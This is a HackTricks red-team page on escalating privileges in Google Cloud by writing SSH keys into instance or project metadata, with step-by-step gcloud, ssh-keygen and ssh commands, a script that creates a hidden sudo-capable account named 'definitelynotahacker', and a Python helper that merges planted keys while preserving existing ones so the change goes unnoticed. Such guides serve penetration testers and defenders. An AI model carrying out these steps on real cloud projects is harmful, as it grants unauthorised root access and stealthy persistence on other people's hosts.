Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Being able to modify instance metadata leads to a full host compromise if the attacker holds the right permission: `compute.instances.setMetadata` on the instance, or `compute.projects.setCommonInstanceMetadata` for project-wide metadata.

On GCP, Linux instances run the Linux Guest Environment for Google Compute Engine (historically the Python guest environment, today the Go based `google-guest-agent`). One of its components, the accounts daemon, regularly polls the instance metadata endpoint for changes to the `ssh-keys` values and keeps the local accounts in sync with them.

Therefore, if an attacker can write custom metadata, the daemon will pick up the new public key and add it to the `~/.ssh/authorized_keys` file of the user named in the entry (each entry has the form `USERNAME:PUBLIC_KEY`). If no local user with that name exists, the agent creates it and adds it to the `google-sudoers` group, which grants passwordless sudo. Either way the attacker ends up with a shell (and usually root) on the host.

Caveat: this only works while access is metadata-based. If OS Login is enabled (`enable-oslogin=TRUE` in instance or project metadata), the agent ignores `ssh-keys` entirely and IAM decides who may log in.
1. Examine the existing SSH keys on the instance. Describe the instance and look under `metadata` for the `ssh-keys` key. Pay attention to the format: the username precedes the key, separated by a colon (`alice:ssh-rsa AAAA... alice`).
    ```bash
    gcloud compute instances describe [INSTANCE] --zone [ZONE]
    ```
2. Prepare a text file for the SSH-key metadata. Save the existing `username:key` lines into a file named `meta.txt`. This is essential: `add-metadata` replaces the whole `ssh-keys` value, so leaving the existing keys out would lock the legitimate users out and make the change noticeable.
3. Generate a new SSH key for the target user (`alice` in this example). The username prefix in `meta.txt` is what the agent uses to pick the account; setting the comment field (`-C`) to the same name just keeps the key consistent with the rest of the metadata.
    ```bash
    ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
    ```
    Append the new public key to `meta.txt` as `alice:<contents of key.pub>`, mimicking the format already found in the instance metadata.
4. Update the instance's SSH-key metadata with `gcloud compute instances add-metadata`.
    ```bash
    gcloud compute instances add-metadata [INSTANCE] --zone [ZONE] --metadata-from-file ssh-keys=meta.txt
    ```
5. Access the instance using the new key. Once the accounts daemon has synced (it polls every few seconds), connect as the target user. `sudo id` shows whether the account also has sudo rights.
    ```bash
    ssh -i ./key alice@localhost sudo id
    ```
    `localhost` assumes you already have a low-privileged shell on the instance (the typical case: a foothold whose attached service account holds the metadata permission). From outside, use the instance's external IP instead.
If no interesting user is found, it's possible to create a new one: the guest agent creates any account named in `ssh-keys` that does not exist yet and adds it to `google-sudoers`, so the new user gets sudo privileges:
```bash
# define the new account username (it does not have to exist yet)
NEWUSER="definitelynotahacker"
# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
# create the input meta file
# NOTE: this overwrites the ssh-keys value; append the existing entries from
# `gcloud compute instances describe` first if you want to keep current users working
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt
# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --zone [ZONE] --metadata-from-file ssh-keys=meta.txt
# ssh to the new account (from a shell already on the instance; use the external IP otherwise)
ssh -i ./key "$NEWUSER"@localhost
```
It's possible to broaden the reach to multiple VMs by applying the SSH keys at the project level instead of on a single instance. Keys in the project's common instance metadata are honoured by every instance in the project that has not explicitly opted out with the `block-project-ssh-keys=TRUE` metadata key (and that does not use OS Login). This requires `compute.projects.setCommonInstanceMetadata`. Summarised:

1. Apply the SSH keys at the project level. Use `gcloud compute project-info add-metadata` to push the keys from `meta.txt` into the project metadata. As with instances, this replaces the existing project-wide `ssh-keys` value, so read the current one with `gcloud compute project-info describe` and include it in `meta.txt` first.
    ```bash
    gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
    ```
2. SSH into instances using the project-wide keys. Every instance that does not block project-wide keys will accept them, so the same private key now opens any such VM in the project. A direct method is `gcloud compute ssh [INSTANCE]`, which logs in with your current username; note that if your principal has the project metadata permission, `gcloud compute ssh` will even add its own `~/.ssh/google_compute_engine` key to the project metadata for you.
    ```bash
    gcloud compute ssh [INSTANCE] --zone [ZONE]
    ```
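The two procedures above (instance-level and project-level `ssh-keys`) share the same two pitfalls: `add-metadata` replaces the whole `ssh-keys` value, and the planted key is silently ignored where OS Login is on or where an instance blocks project-wide keys. The following helper is an added example, not HackTricks' code or anything Google ships. It takes the JSON that `gcloud compute instances describe ... --format=json` or `gcloud compute project-info describe --format=json` prints, merges a new `username:key` entry without dropping the existing ones, and reports why an instance would not honour the key. The `web-1`/`example-project` JSON documents, the users and the key material are constructed for the demo; `merge_keys.py` is an assumed script name.

```python
"""Merge a new key into GCE ssh-keys metadata and check whether the guest agent will honour it.

Added example (not HackTricks' own code). Pipe in the JSON from either
  gcloud compute instances describe [INSTANCE] --zone [ZONE] --format=json  -> metadata.items
  gcloud compute project-info describe --format=json                        -> commonInstanceMetadata.items
The two SAMPLE_* documents below are constructed to mimic that output.
"""
import json
import sys

# Constructed sample: an instance with two existing keys that blocks project-wide
# keys and explicitly turns OS Login off (overriding the project setting below).
SAMPLE_INSTANCE_JSON = r"""
{
  "name": "web-1",
  "metadata": {
    "items": [
      {"key": "ssh-keys",
       "value": "bob:ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyBob bob\ncarol:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABExampleKeyCarol carol"},
      {"key": "block-project-ssh-keys", "value": "TRUE"},
      {"key": "enable-oslogin", "value": "FALSE"}
    ]
  }
}
"""

# Constructed sample: project metadata enabling OS Login for every instance that does not override it.
SAMPLE_PROJECT_JSON = r"""
{
  "name": "example-project",
  "commonInstanceMetadata": {
    "items": [
      {"key": "enable-oslogin", "value": "TRUE"},
      {"key": "ssh-keys", "value": "dave:ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDave dave"}
    ]
  }
}
"""


def sample_instance_items():
    return json.loads(SAMPLE_INSTANCE_JSON)["metadata"]["items"]


def sample_project_items():
    return json.loads(SAMPLE_PROJECT_JSON)["commonInstanceMetadata"]["items"]


def items_to_dict(items):
    """gcloud returns metadata as a list of {key, value} objects; index it by key."""
    return {item["key"]: item["value"] for item in (items or [])}


def parse_ssh_keys(value):
    """Split an ssh-keys value into (username, key) pairs; the username is everything before the first ':'."""
    entries = []
    for line in (value or "").splitlines():
        line = line.strip()
        if not line:
            continue
        user, _, key = line.partition(":")
        entries.append((user, key))
    return entries


def merge_ssh_keys(existing_value, username, pubkey):
    """Return the new ssh-keys value: every existing entry plus username:pubkey.

    add-metadata replaces the whole ssh-keys value, so dropping the existing
    entries would lock out the legitimate users (and get the change noticed).
    """
    entries = parse_ssh_keys(existing_value)
    new_entry = (username, pubkey.strip())
    if new_entry not in entries:
        entries.append(new_entry)
    return "\n".join(f"{user}:{key}" for user, key in entries) + "\n"


def effective_flag(instance_items, project_items, key):
    """Instance metadata overrides project metadata for the same key."""
    inst, proj = items_to_dict(instance_items), items_to_dict(project_items)
    return inst.get(key, proj.get(key, "")).strip().upper()


def blockers(instance_items, project_items, planting_at_project):
    """Reasons the planted key would be ignored on this instance (empty list means go ahead)."""
    reasons = []
    if effective_flag(instance_items, project_items, "enable-oslogin") == "TRUE":
        reasons.append("enable-oslogin=TRUE: the guest agent ignores metadata ssh-keys, OS Login decides who gets in")
    if planting_at_project and items_to_dict(instance_items).get("block-project-ssh-keys", "").upper() == "TRUE":
        reasons.append("block-project-ssh-keys=TRUE: this instance ignores project-wide ssh-keys")
    return reasons


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: gcloud ... describe ... --format=json | python3 merge_keys.py alice ./key.pub > meta.txt
        described = json.load(sys.stdin)
        meta = described.get("metadata") or described.get("commonInstanceMetadata") or {}
        with open(sys.argv[2]) as fh:
            pubkey = fh.read()
        sys.stdout.write(merge_ssh_keys(items_to_dict(meta.get("items")).get("ssh-keys"), sys.argv[1], pubkey))
    else:
        inst, proj = sample_instance_items(), sample_project_items()
        print("instance-level planting blocked by:", blockers(inst, proj, False))
        print("project-level planting blocked by:", blockers(inst, proj, True))
        print(merge_ssh_keys(items_to_dict(inst)["ssh-keys"], "alice", "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABExampleKeyAlice alice"))
```

Run without arguments for the offline demo with the constructed samples: `web-1` accepts an instance-level key (it overrides the project's OS Login setting with `FALSE`) but rejects project-wide keys, while an instance with no metadata of its own inherits `enable-oslogin=TRUE` from the project and ignores `ssh-keys` altogether. Write the merged output to `meta.txt` and feed it to `add-metadata` as in the steps above.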